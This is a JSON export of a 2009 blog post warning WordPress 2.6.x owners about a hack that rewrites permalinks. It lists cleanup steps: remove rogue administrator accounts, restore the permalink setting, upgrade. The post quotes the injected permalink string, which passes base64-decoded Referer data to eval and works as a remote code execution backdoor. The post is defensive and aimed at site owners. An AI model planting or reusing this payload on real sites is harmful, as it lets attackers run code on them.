{"id":832,"date":"2009-09-04T23:00:40","date_gmt":"2009-09-04T15:00:40","guid":{"rendered":"http:\/\/www.whoisandrewwee.com\/?p=832"},"modified":"2009-09-05T07:19:16","modified_gmt":"2009-09-04T23:19:16","slug":"wordpress-26-permalink-problem","status":"publish","type":"post","link":"http:\/\/whoisandrewwee.com\/blogging\/wordpress-26-permalink-problem\/","title":{"rendered":"URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps"},"content":{"rendered":"
I checked my blog and the URLs looked malformed, with the following structure: http:\/\/www.whoisandrewwee.com\/2009\/09\/03\/unlocking-unconventional-traffic-sources-for-affiliate-campaigns\/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D)<\/a>)%7D%7D|.+)&%\/#comment-506929<\/p>\n If you notice something similar or weird with your WordPress blog, you might want to take the following steps:<\/p>\n Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.<\/p>\n If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%\/#comment-506929”, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex<\/a>.<\/p>\n You can also check out this other blog post<\/a> for more details.<\/p>\n Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.<\/p>\n UPDATE<\/strong>: Matt Mullenweg from the WordPress development team has posted<\/a> about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening<\/a>.<\/p>\n You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins\/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.<\/p>\n","protected":false},"excerpt":{"rendered":" I checked my blog and the URLs looked malformed, with the following structure: http:\/\/www.whoisandrewwee.com\/2009\/09\/03\/unlocking-unconventional-traffic-sources-for-affiliate-campaigns\/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%\/#comment-506929 If you notice something similar or weird with your WordPress blog, you might want to take the following steps: Check the “users” tab from the WP admin interface Remove any unfamiliar users, esp those marked as “administrator” To prevent users from […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[24],"tags":[1760,1759],"_links":{"self":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts\/832"}],"collection":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/comments?post=832"}],"version-history":[{"count":0,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts\/832\/revisions"}],"wp:attachment":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/media?parent=832"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/categories?post=832"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/tags?post=832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n